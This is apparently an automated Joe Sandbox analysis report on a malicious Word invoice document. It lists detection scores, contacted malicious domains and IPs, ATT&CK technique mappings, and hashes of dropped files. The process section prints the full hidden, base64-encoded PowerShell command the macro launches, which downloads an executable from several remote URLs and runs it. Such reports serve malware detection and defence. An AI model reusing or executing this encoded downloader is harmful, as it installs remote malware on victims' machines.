Windows
Analysis Report
INV_PO_12172019EX.doc
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 1568 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- powershell.exe (PID: 2412 cmdline:
Powershell -w hidden -en JABOA HAAegBmAHI AbgB6AGIAc gB0AGkAdQB tAD0AJwBWA GYAZgB1AHc AeQBoAHkAa QBnAGkAeQB xACcAOwAkA EUAcwB4AHQ AeQBkAGoAc ABrACAAPQA gACcAOAA3A DMAJwA7ACQ AWQBsAG4Aa gBxAHMAcwB jAG0AcABtA D0AJwBXAHk AbABxAGEAa QBkAGsAcQB hACcAOwAkA EkAbQB4AGY AcgB4AHQAY QBwAG8APQA kAGUAbgB2A DoAdQBzAGU AcgBwAHIAb wBmAGkAbAB lACsAJwBcA CcAKwAkAEU AcwB4AHQAe QBkAGoAcAB rACsAJwAuA GUAeABlACc AOwAkAFIAc gB5AGkAcAB qAGYAaABkA D0AJwBZAHQ AaQBkAG4AY wBpAGcAbAB lACcAOwAkA FUAdwB1AGQ AcgBtAG8AZ wBqAGwAbwB zAG0APQAmA CgAJwBuAGU AdwAtACcAK wAnAG8AYgB qAGUAYwAnA CsAJwB0ACc AKQAgAG4AZ QBUAC4AVwB FAEIAYwBMA EkAZQBOAFQ AOwAkAEcAc ABjAGsAeQB zAGMAeQBhA GUAbgBkAHo APQAnAGgAd AB0AHAAOgA vAC8AYQBtA HMAdABhAGY AZgByAGUAY wBvAHIAZAB zAC4AYwBvA G0ALwBpAG4 AZABpAHYAa QBkAHUAYQB sAEEAcABpA C8AMAAvACo AaAB0AHQAc AA6AC8ALwB mAG8AbwB6A G8AbwBwAC4 AYwBvAG0AL wB3AHAALQB jAG8AbgB0A GUAbgB0AC8 AUQB4AGkAN wBpAFYARAA vACoAaAB0A HQAcAA6AC8 ALwA3AGEAc gBhAHMAcAB vAHIAdAAuA GMAbwBtAC8 AdgBhAGwAa QBkAGEAdAB lAGYAaQBlA GwAZAAvAGc AagAvACoAa AB0AHQAcAA 6AC8ALwBkA GUAdgAyAC4 AZQBrAHQAb wBuAGUAbgB kAG8AbgAuA GcAcgAvAGM AZwBpAC0AY gBpAG4ALwB tAFQAVABDA EYAbQBWAGU ALwAqAGgAd AB0AHAAcwA 6AC8ALwBkA GkAYQBnAG4 AbwBzAHQAa QBjAGEALQB wAHIAbwBkA HUAYwB0AHM ALgBjAG8Ab QAvAHcAcAA tAGEAZABtA GkAbgAvAGg AaQBvADIAd QA3AHcALwA nAC4AIgBzA GAAUABMAGk AdAAiACgAJ wAqACcAKQA 7ACQASQB4A GkAcQBvAGc AZgBpAGsAb QA9ACcAQgB 0AHQAeABnA GgAdgBpAG4 AbwBtAHcAc wAnADsAZgB vAHIAZQBhA GMAaAAoACQ ATQBiAGMAb gB6AGcAcwB wAGEAdAAgA GkAbgAgACQ ARwBwAGMAa wB5AHMAYwB 5AGEAZQBuA GQAegApAHs AdAByAHkAe wAkAFUAdwB 1AGQAcgBtA G8AZwBqAGw AbwBzAG0AL gAiAEQATwB XAGAATgBMA E8AYABBAEQ AYABGAEkAb ABFACIAKAA kAE0AYgBjA G4AegBnAHM AcABhAHQAL AAgACQASQB tAHgAZgByA HgAdABhAHA AbwApADsAJ ABIAGgAdAB vAGIAZgBmA HAAbABnAHM APQAnAFgAY QB5AG0AcAB pAGMAdQAnA DsASQBmACA AKAAoAC4AK AAnAEcAJwA rACcAZQB0A C0AJwArACc ASQB0AGUAb QAnACkAIAA kAEkAbQB4A GYAcgB4AHQ AYQBwAG8AK QAuACIAbAB gAEUAbgBHA GAAVABIACI AIAAtAGcAZ QAgADIANwA xADYAOQApA CAAewBbAEQ AaQBhAGcAb gBvAHMAdAB pAGMAcwAuA FAAcgBvAGM AZQBzAHMAX QA6ADoAIgB zAFQAYABBA FIAdAAiACg AJABJAG0Ae ABmAHIAeAB 0AGEAcABvA CkAOwAkAEU AaQBkAHkAd ABrAGwAeQA 9ACcAWQBiA HEAeABjAHU AdgBkAGkAc QBuACcAOwB iAHIAZQBhA GsAOwAkAEw AbQBxAGEAa ABqAGMAdwB 5AHcAdABrA D0AJwBHAHc AYQB1AHUAa ABsAHoAJwB 9AH0AYwBhA HQAYwBoAHs AfQB9ACQAT wBuAG8AZwB xAGIAdQBtA G8APQAnAEw AZABrAGUAb wBnAHMAYQB mAHgAbgBqA CcA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | File opened: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Networking |
---|
Source: | String found in memory: | ||
Source: | String found in memory: | ||
Source: | String found in memory: | ||
Source: | String found in memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Source: | Process created: |
Source: | OLE, VBA macro line: | ||
Source: | OLE, VBA macro: | ||
Source: | OLE, VBA macro line: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: | ||
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | OLE indicator, ObjectPool: |
Source: | OLE indicator, VBA macros: | ||
Source: | OLE indicator, VBA macros: |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: |
Source: | LNK file: |
Source: | OLE indicator, Word Document stream: |
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Mutant created: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window found: |
Source: | File opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Initial sample: |
Data Obfuscation |
---|
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | WMI Queries: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Thread sleep time: |
Source: | Thread delayed: |
Source: | Process information queried: |
Source: | Thread delayed: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Binary or memory string: |
Source: | Process token adjusted: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Process created: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 11 Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 11 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 2 Scripting | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | 3 Exploitation for Client Execution | Logon Script (Mac) | Logon Script (Mac) | 1 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Scripting | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
30% | ReversingLabs | Script-Macro.Trojan.Heuristic | ||
70% | Virustotal | Browse | ||
100% | Avira | W97M/Agent.5776312 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse | ||
8% | Virustotal | Browse | ||
9% | Virustotal | Browse | ||
1% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
701602.parkingcrew.net | 13.248.148.254 | true | false | high | |
7arasport.com | 103.224.212.222 | true | true |
| unknown |
dev2.ektonendon.gr | 162.212.129.161 | true | true |
| unknown |
amstaffrecords.com | unknown | unknown | true |
| unknown |
ww38.7arasport.com | unknown | unknown | true |
| unknown |
diagnostica-products.com | unknown | unknown | true | unknown | |
foozoop.com | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
true |
| unknown | ||
false | high | |||
true |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false | high | |||
true |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
true |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
13.248.148.254 | 701602.parkingcrew.net | United States | 16509 | AMAZON-02US | false | |
103.224.212.222 | 7arasport.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true | |
162.212.129.161 | dev2.ektonendon.gr | United States | 55293 | A2HOSTINGUS | true |
IP |
---|
192.168.2.255 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 800690 |
Start date and time: | 2023-02-07 18:13:09 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | INV_PO_12172019EX.doc |
Detection: | MAL |
Classification: | mal100.troj.evad.winDOC@2/19@6/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, conhost.exe
- Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
18:13:25 | API Interceptor |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FD181C6.wmf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 444 |
Entropy (8bit): | 3.2627072103345656 |
Encrypted: | false |
SSDEEP: | 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSN+uztl:O905TZzSWfbUYvn7xl |
MD5: | 11D3F9A2B8772B00E439701105F9E8EF |
SHA1: | 19F7EDC5F445A9A54827570476F06835BAF9EBB8 |
SHA-256: | 60A14153FAC78B3EE62D0E5418F76DD4AA3A723EBC52622D7DF5A12FC3A44A60 |
SHA-512: | 48F13B0FA31B8FA0EC89047A3F0B42A9DC72114692AEEC276D4F54FF72548F421C8BB3BB3398B7C47BB6AB39E5F835CBDFC34AB50A856C439145C68ECA136EDE |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE7B0F.wmf
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 444 |
Entropy (8bit): | 2.99722014911087 |
Encrypted: | false |
SSDEEP: | 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNCruztl:O905TZzSWfbUYvnbxl |
MD5: | DB2FD781DF517D35D27E6B53B22624F0 |
SHA1: | F756270EE429D39C5719D936677D090F9407C5BE |
SHA-256: | 7A7F34B2D7F284921D09B7D0810B9662FC712B5783333CEB6CCDE2A69A67C698 |
SHA-512: | E8C84F43CA1E7B3C9A08FD0DF40376C2CAC8B0AB3D18F44CAF39510E86611D886FC74EDF32A524C9DE06DEA2E0F2420E796897703095D328340434662DD4C14D |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 40960 |
Entropy (8bit): | 5.128863223295907 |
Encrypted: | false |
SSDEEP: | 768:3P0zasWmNf4gZ6OPpAkrbfzHSS+hr4fXuPA9TltJHdUdppiXlcSRVkhpchcHicHf:fUasZfzZ9PpAkrbfzHSS+hr4fXz/H6dt |
MD5: | DFD24CBE556204FDA04E205C1D98862B |
SHA1: | C0A16296134D92A489DD50329E7BB3FAF60A6B8E |
SHA-256: | 5A8FA0E0D1F96021CD3B501B2D736004B4AF2549F98BE08A987232E8B55DFDC0 |
SHA-512: | E37347A89C793A88646E6CB61386CDFFBFC7A06159795FE0EA7C61D19F8E31BA65180C7CB432E5D1B77D84DD67596BCC997A41301EE983568656104F33BD0013 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111460 |
Entropy (8bit): | 4.944876294992553 |
Encrypted: | false |
SSDEEP: | 1536:rgoD5EyP3uLmO7PTpJNTMf+zw1n/+JDoOii/UNx3UEPqB4dBH:rxP3kmOf/NTMRn/+5/Grqi |
MD5: | 845A290401571DFC12E05E2FF969DFC6 |
SHA1: | 837CC20C2A302CC48404BB6D762D54C8834F12D2 |
SHA-256: | 3C0D99443446B0517258BA8846B9EB4B04C09CEED2E3F4677DDA1F6E26D5A8DB |
SHA-512: | AF24AC05BF79FEECCD8176F7B419F69D5D13DC7830E2732AADF3C00AA89728E2191F3A8B5AB60A6A5562ECE1B6D3F82D2D3F9D70AAE5579013CF5A774E9EACB3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 166724 |
Entropy (8bit): | 4.37296320699445 |
Encrypted: | false |
SSDEEP: | 1536:IU+zL6wNSc8SetKB4YuiMOqK/WVMO+O9sOHK7K2xBmsqsDPza7vKp:IPjNSc83tKBduiMnAOXTK7K1Kp |
MD5: | F22C81C73CE8DDFDCAA8D16031E935BB |
SHA1: | 5A1B8B5F859652067794926CCD5547FEE8AAF1BD |
SHA-256: | F042CD4DD958DE038353AADED933F9D87C4493BC3BF25EA2B965C6CC078249BB |
SHA-512: | 20771EE51CDB267C47F6C85A90335609156F5BA052B0478BC56E8B2526A469BC93E227BEE05FC0E44470AF26A38D8C1CF93E8AE1F466BF126AE33DA756236442 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98816 |
Entropy (8bit): | 4.80498431928288 |
Encrypted: | false |
SSDEEP: | 3072:ajTjzxfDLcUaOBsnRmsAqgeindy/O7svT06CER6MrVd8w:ajTjzVDQUaOBsnRmsAqgeidWvTA |
MD5: | 8EA37B0DD197D80D0B6092428925E595 |
SHA1: | AA525DF7BE573F549F2F8C9C9B6702B284935CEE |
SHA-256: | 397ABFA5376C024D8FF06FDF47D908EB40E658FEB63BD6296877CFAB286C073B |
SHA-512: | BFA29CBABD8D5370DC34F2DFE3B19EAFCC549FAA25787FBC2C9E549A6D14D423C949875FA60E1A879DF1546CDB23486EA5566B81267AB75EF5DC7C987F8AD549 |
Malicious: | true |
Antivirus: |
|
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9728 |
Entropy (8bit): | 3.5003324374730655 |
Encrypted: | false |
SSDEEP: | 192:+ALpx9kUlMSWcVdWrPjbpVBKt/hzh7c5vRNAwdq6UicQ2DWl5i:+OpxiUySWcSRVO/h97chcHicQ2DWL |
MD5: | 3B6BF2E49B8C92085C7E72F1CF422332 |
SHA1: | 046A48AC1248673AA5F5AE5EE53910B488C481DC |
SHA-256: | 4AC2D5F6BAA0615028B78F7CEA348A7D33156178819C0CCC4DC50A521DCAEC4A |
SHA-512: | 03A6232D49846C85CF53398C35C304438ACE954997AAFA9987865F778FF8786D0D3DF1B84900A91C1A7065B65225DA44391B3F0CB10F5262243D7F90F6D44134 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.1464700112623651 |
Encrypted: | false |
SSDEEP: | 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X |
MD5: | 72F5C05B7EA8DD6059BF59F50B22DF33 |
SHA1: | D5AF52E129E15E3A34772806F6C5FBF132E7408E |
SHA-256: | 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164 |
SHA-512: | 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115588 |
Entropy (8bit): | 4.951590765318803 |
Encrypted: | false |
